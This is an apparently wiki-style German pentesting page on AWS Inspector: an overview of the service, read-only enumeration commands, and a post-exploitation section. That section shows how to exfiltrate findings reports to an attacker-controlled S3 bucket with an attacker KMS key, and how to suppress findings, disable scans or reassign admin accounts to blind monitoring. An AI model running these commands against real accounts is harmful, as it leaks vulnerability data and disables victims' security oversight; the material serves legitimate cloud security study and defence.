AWS - Inspector Enum

AWS - Inspector Enum

Inspector

Amazon Inspector ist ein fortschrittlicher, automatisierter Schwachstellen-Management-Service, der entwickelt wurde, um die Sicherheit Ihrer AWS-Umgebung zu verbessern. Dieser Service scannt kontinuierlich Amazon EC2-Instanzen, Container-Images in Amazon ECR, Amazon ECS und AWS Lambda-Funktionen auf Schwachstellen und unbeabsichtigte Netzwerkexpositionen. Durch die Nutzung einer umfangreichen Schwachstellen-Intelligenzdatenbank bietet Amazon Inspector detaillierte Ergebnisse, einschließlich Schweregraden und Empfehlungen zur Fehlerbehebung, um Organisationen dabei zu helfen, Sicherheitsrisiken proaktiv zu identifizieren und anzugehen. Dieser umfassende Ansatz gewährleistet eine gestärkte Sicherheitsposition über verschiedene AWS-Services hinweg und unterstützt die Einhaltung und Risikomanagement.

Schlüsselelemente

Ergebnisse

Ergebnisse in Amazon Inspector sind detaillierte Berichte über Schwachstellen und Expositionen, die während des Scans von EC2-Instanzen, ECR-Repositories oder Lambda-Funktionen entdeckt wurden. Basierend auf ihrem Zustand werden Ergebnisse kategorisiert als:

• Aktiv: Die Entdeckung wurde nicht behoben.

• Geschlossen: Die Entdeckung wurde behoben.

• Unterdrückt: Die Entdeckung wurde aufgrund einer oder mehrerer Unterdrückungsregeln mit diesem Status markiert.

Ergebnisse werden auch in die folgenden drei Typen kategorisiert:

• Paket: Diese Ergebnisse beziehen sich auf Schwachstellen in Softwarepaketen, die auf Ihren Ressourcen installiert sind. Beispiele sind veraltete Bibliotheken oder Abhängigkeiten mit bekannten Sicherheitsproblemen.

• Code: Diese Kategorie umfasst Schwachstellen im Code von Anwendungen, die auf Ihren AWS-Ressourcen ausgeführt werden. Häufige Probleme sind Codierungsfehler oder unsichere Praktiken, die zu Sicherheitsverletzungen führen könnten.

• Netzwerk: Netzwerk-Ergebnisse identifizieren potenzielle Expositionen in Netzwerkkonfigurationen, die von Angreifern ausgenutzt werden könnten. Dazu gehören offene Ports, unsichere Netzwerkprotokolle und fehlerhaft konfigurierte Sicherheitsgruppen.

Filter und Unterdrückungsregeln

Filter und Unterdrückungsregeln in Amazon Inspector helfen dabei, Ergebnisse zu verwalten und zu priorisieren. Filter ermöglichen es Ihnen, Ergebnisse basierend auf spezifischen Kriterien wie Schweregrad oder Ressourcentyp zu verfeinern. Unterdrückungsregeln ermöglichen es Ihnen, bestimmte Ergebnisse zu unterdrücken, die als geringes Risiko angesehen werden, bereits behoben wurden oder aus einem anderen wichtigen Grund, um zu verhindern, dass sie Ihre Sicherheitsberichte überlasten, und es Ihnen ermöglichen, sich auf kritischere Probleme zu konzentrieren.

Software-Bestandsliste (SBOM)

Eine Software-Bestandsliste (SBOM) in Amazon Inspector ist eine exportierbare verschachtelte Bestandsliste, die alle Komponenten innerhalb eines Softwarepakets, einschließlich Bibliotheken und Abhängigkeiten, detailliert auflistet. SBOMs helfen dabei, Transparenz in die Software-Lieferkette zu bringen, was eine bessere Schwachstellenverwaltung und Einhaltung ermöglicht. Sie sind entscheidend für die Identifizierung und Minderung von Risiken im Zusammenhang mit Open-Source- und Drittanbieter-Softwarekomponenten.

Schlüsselfunktionen

Export von Ergebnissen

Amazon Inspector bietet die Möglichkeit, Ergebnisse in Amazon S3-Buckets, Amazon EventBridge und AWS Security Hub zu exportieren, was es Ihnen ermöglicht, detaillierte Berichte über identifizierte Schwachstellen und Expositionen für weitere Analysen oder den Austausch zu einem bestimmten Datum und Zeitpunkt zu generieren. Diese Funktion unterstützt verschiedene Ausgabeformate wie CSV und JSON, was die Integration mit anderen Tools und Systemen erleichtert. Die Exportfunktionalität ermöglicht die Anpassung der in den Berichten enthaltenen Daten, sodass Sie Ergebnisse basierend auf spezifischen Kriterien wie Schweregrad, Ressourcentyp oder Datumsbereich filtern und standardmäßig alle Ihre Ergebnisse im aktuellen AWS-Region mit einem aktiven Status einschließen können.

Beim Exportieren von Ergebnissen ist ein Schlüsselverwaltungsdienst (KMS) erforderlich, um die Daten während des Exports zu verschlüsseln. KMS-Schlüssel stellen sicher, dass die exportierten Ergebnisse vor unbefugtem Zugriff geschützt sind und bieten eine zusätzliche Sicherheitsebene für sensible Schwachstelleninformationen.

Scannen von Amazon EC2-Instanzen

Amazon Inspector bietet robuste Scannmöglichkeiten für Amazon EC2-Instanzen, um Schwachstellen und Sicherheitsprobleme zu erkennen. Inspector vergleicht extrahierte Metadaten von der EC2-Instanz mit Regeln aus Sicherheitswarnungen, um Paketschwachstellen und Netzwerkzugriffsprobleme zu identifizieren. Diese Scans können durch agentenbasierte oder agentenlose Methoden durchgeführt werden, abhängig von der Konfiguration der Scanmodus-Einstellungen Ihres Kontos.

• Agentenbasiert: Verwendet den AWS Systems Manager (SSM)-Agenten für eingehende Scans. Diese Methode ermöglicht eine umfassende Datensammlung und -analyse direkt von der Instanz.

• Agentenlos: Bietet eine leichtgewichtige Alternative, die keine Installation eines Agenten auf der Instanz erfordert, indem ein EBS-Snapshot von jedem Volume der EC2-Instanz erstellt wird, nach Schwachstellen gesucht und dann gelöscht wird; Nutzung der vorhandenen AWS-Infrastruktur für das Scannen.

Der Scanmodus bestimmt, welche Methode für die Durchführung von EC2-Scans verwendet wird:

• Agentenbasiert: Beinhaltet die Installation des SSM-Agenten auf EC2-Instanzen für eine gründliche Inspektion.

• Hybrid-Scannen: Kombiniert agentenbasierte und agentenlose Methoden, um die Abdeckung zu maximieren und die Leistungsauswirkungen zu minimieren. Bei den EC2-Instanzen, auf denen der SSM-Agent installiert ist, führt Inspector einen agentenbasierten Scan durch, und bei denen, auf denen kein SSM-Agent vorhanden ist, wird ein agentenloser Scan durchgeführt.

Eine weitere wichtige Funktion ist die gründliche Inspektion für EC2-Linux-Instanzen. Diese Funktion bietet eine gründliche Analyse der Software und Konfiguration von EC2-Linux-Instanzen und bietet detaillierte Schwachstellenbewertungen, einschließlich Betriebssystemschwachstellen, Anwendungsschwachstellen und Konfigurationsfehler, um eine umfassende Sicherheitsbewertung sicherzustellen. Dies wird durch die Inspektion von benutzerdefinierten Pfaden und all ihren Unterverzeichnissen erreicht. Standardmäßig wird Amazon Inspector die folgenden Pfade scannen, aber jedes Mitgliedskonto kann bis zu 5 weitere benutzerdefinierte Pfade definieren, und jeder delegierte Administrator bis zu 10:

• /usr/lib

• /usr/lib64

• /usr/local/lib

• /usr/local/lib64

Scannen von Amazon ECR-Container-Images

Amazon Inspector bietet robuste Scannmöglichkeiten für Amazon Elastic Container Registry (ECR)-Container-Images, um sicherzustellen, dass Paketschwachstellen effizient erkannt und verwaltet werden.

• Grundlegendes Scannen: Dies ist ein schneller und leichtgewichtiger Scan, der bekannte OS-Paketschwachstellen in Container-Images mithilfe eines Standardsets von Regeln aus dem Open-Source-Projekt Clair identifiziert. Mit dieser Scankonfiguration werden Ihre Repositorien beim Push oder bei manuellen Scans gescannt.

• Erweitertes Scannen: Diese Option fügt dem Push-Scan die kontinuierliche Scannfunktion hinzu. Das erweiterte Scannen taucht tiefer in die Schichten jedes Container-Images ein, um Schwachstellen in OS-Paketen und Programmiersprachenpaketen mit höherer Genauigkeit zu identifizieren. Es analysiert sowohl das Basisimage als auch alle zusätzlichen Schichten und bietet einen umfassenden Überblick über potenzielle Sicherheitsprobleme.

Scannen von Amazon Lambda-Funktionen

Amazon Inspector bietet umfassende Scannmöglichkeiten für AWS Lambda-Funktionen und deren Schichten, um die Sicherheit und Integrität serverloser Anwendungen zu gewährleisten. Inspector bietet zwei Arten von Scans für Lambda-Funktionen:

• Standard-Scannen von Lambda: Diese Standardfunktion identifiziert Software-Schwachstellen in den Anwendungspaketabhängigkeiten, die Ihrer Lambda-Funktion und Schichten hinzugefügt wurden. Wenn Ihre Funktion beispielsweise eine Version einer Bibliothek wie python-jwt mit einer bekannten Schwachstelle verwendet, wird eine Entdeckung generiert.

• Code-Scannen von Lambda: Analysiert benutzerdefinierten Anwendungscode auf Sicherheitsprobleme und erkennt Schwachstellen wie Injektionsfehler, Datenlecks, schwache Verschlüsselung und fehlende Verschlüsselung. Es erfasst Codeausschnitte, die die erkannten Schwachstellen hervorheben, wie z. B. hartcodierte Anmeldeinformationen. Die Ergebnisse enthalten detaillierte Empfehlungen zur Fehlerbehebung und Codeausschnitte zur Behebung der Probleme.

Center for Internet Security (CIS) Scans

Amazon Inspector enthält CIS-Scans, um die Betriebssysteme von Amazon EC2-Instanzen mit den Empfehlungen bewährter Verfahren des Center for Internet Security (CIS) zu benchmarken. Diese Scans stellen sicher, dass Konfigurationen den Sicherheitsgrundlinien der Industriestandards entsprechen.

• Konfiguration: CIS-Scans bewerten, ob Systemkonfigurationen spezifischen CIS Benchmark-Empfehlungen entsprechen, wobei jeder Check mit einer CIS-Check-ID und einem Titel verknüpft ist.

• Ausführung: Scans werden basierend auf Instanz-Tags und definierten Zeitplänen durchgeführt oder geplant.

• Ergebnisse: Die Ergebnisse nach dem Scan zeigen an, welche Checks bestanden, übersprungen oder fehlgeschlagen sind und geben Einblick in die Sicherheitslage jeder Instanz.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post-Exploitation

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Ein Angreifer könnte detaillierte Berichte über Schwachstellen oder Software-Bestandsaufnahmen (SBOMs) generieren und aus Ihrer AWS-Umgebung exfiltrieren. Diese Informationen könnten ausgenutzt werden, um spezifische Schwächen, veraltete Software oder unsichere Abhängigkeiten zu identifizieren, die gezielte Angriffe ermöglichen.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Das folgende Beispiel zeigt, wie alle aktiven Ergebnisse von Amazon Inspector in einen von einem Angreifer kontrollierten Amazon S3-Bucket mit einem von einem Angreifer kontrollierten Amazon KMS-Schlüssel exfiltriert werden können:

1. Erstellen Sie einen Amazon S3-Bucket und fügen Sie eine Richtlinie hinzu, damit er vom Opfer-Amazon Inspector aus zugänglich ist:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}

2. Erstellen Sie einen Amazon KMS-Schlüssel und fügen Sie eine Richtlinie hinzu, damit er vom Amazon Inspector des Opfers verwendet werden kann:

{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}

3. Führen Sie den Befehl aus, um den Befundbericht zu erstellen und ihn zu exfiltrieren:

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• Potenzielle Auswirkungen: Generierung und Exfiltration von detaillierten Schwachstellen- und Softwareberichten, um Einblicke in spezifische Schwachstellen und Sicherheitsschwächen zu gewinnen.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Ein Angreifer könnte die Generierung des angegebenen Befundberichts oder SBOM-Berichts abbrechen, was verhindert, dass Sicherheitsteams rechtzeitig Informationen zu Schwachstellen und Software-Bestandsaufnahmen erhalten, und die Erkennung und Behebung von Sicherheitsproblemen verzögern.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• Potenzielle Auswirkungen: Störung der Sicherheitsüberwachung und Verhinderung der rechtzeitigen Erkennung und Behebung von Sicherheitsproblemen.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Ein Angreifer mit diesen Berechtigungen könnte die Filterregeln manipulieren, die bestimmen, welche Schwachstellen und Sicherheitsprobleme gemeldet oder unterdrückt werden (wenn die Aktion auf SUPPRESS gesetzt ist, würde eine Unterdrückungsregel erstellt). Dies könnte kritische Schwachstellen vor Sicherheitsadministratoren verbergen und es einfacher machen, diese Schwächen ohne Entdeckung auszunutzen. Indem wichtige Filter geändert oder entfernt werden, könnte ein Angreifer auch durch Überfluten des Systems mit irrelevanten Ergebnissen Lärm erzeugen, was eine effektive Sicherheitsüberwachung und Reaktion behindert.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• Potenzielle Auswirkungen: Verbergen oder Unterdrücken von kritischen Schwachstellen oder Überfluten des Systems mit irrelevanten Ergebnissen.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Ein Angreifer könnte die Sicherheitsmanagementstruktur erheblich stören.

• Durch Deaktivieren des delegierten Admin-Kontos könnte der Angreifer das Sicherheitsteam daran hindern, auf Amazon Inspector-Einstellungen und Berichte zuzugreifen und diese zu verwalten.

• Das Aktivieren eines nicht autorisierten Admin-Kontos würde es einem Angreifer ermöglichen, Sicherheitskonfigurationen zu kontrollieren, möglicherweise Scans zu deaktivieren oder Einstellungen zu ändern, um bösartige Aktivitäten zu verbergen.

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• Potenzielle Auswirkung: Störung des Sicherheitsmanagements.

inspector2:AssociateMember, inspector2:DisassociateMember

Ein Angreifer könnte die Zuordnung von Mitgliedskonten innerhalb einer Amazon Inspector-Organisation manipulieren. Indem er nicht autorisierte Konten zuordnet oder legitime Konten trennt, könnte ein Angreifer kontrollieren, welche Konten in Sicherheitsscans und Berichten enthalten sind. Dies könnte dazu führen, dass wichtige Konten von der Sicherheitsüberwachung ausgeschlossen werden, was es dem Angreifer ermöglichen würde, Schwachstellen in diesen Konten auszunutzen, ohne entdeckt zu werden.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• Potenzielle Auswirkungen: Ausschluss wichtiger Konten von Sicherheitsprüfungen, was eine unentdeckte Ausnutzung von Schwachstellen ermöglicht.

inspector2:Deaktivieren, (inspector2:Aktivieren & iam:CreateServiceLinkedRole)

Ein Angreifer mit der Berechtigung inspector2:Deaktivieren könnte Sicherheitsprüfungen für bestimmte Ressourcentypen (EC2, ECR, Lambda, Lambda-Code) über die angegebenen Konten deaktivieren, wodurch Teile der AWS-Umgebung nicht überwacht und anfällig für Angriffe werden. Darüber hinaus könnte ein Angreifer mit den Berechtigungen inspector2:Aktivieren & iam:CreateServiceLinkedRole dann selektiv Scans wieder aktivieren, um die Erkennung verdächtiger Konfigurationen zu vermeiden.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• Potenzielle Auswirkung: Schaffung von blinden Flecken in der Sicherheitsüberwachung.

inspector2:UpdateOrganizationConfiguration

Ein Angreifer mit dieser Berechtigung könnte die Konfigurationen für Ihre Amazon Inspector-Organisation aktualisieren und somit die standardmäßig aktivierten Scan-Funktionen für neue Mitgliedskonten beeinflussen.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• Potenzielle Auswirkungen: Sicherheits-Scan-Richtlinien und Konfigurationen für die Organisation ändern.

inspector2:TagResource, inspector2:UntagResource

Ein Angreifer könnte Tags auf AWS Inspector-Ressourcen manipulieren, die entscheidend für die Organisation, Verfolgung und Automatisierung von Sicherheitsbewertungen sind. Durch Ändern oder Entfernen von Tags könnte ein Angreifer potenziell Sicherheitslücken vor Sicherheitsscans verbergen, die Compliance-Berichterstattung stören und automatisierte Behebungsprozesse beeinträchtigen, was zu nicht überprüften Sicherheitsproblemen und beeinträchtigter Systemintegrität führen könnte.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• Potenzielle Auswirkungen: Verbergen von Schwachstellen, Störung der Compliance-Berichterstattung, Störung der Sicherheitsautomatisierung und Störung der Kostenzuweisung.

Referenzen

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html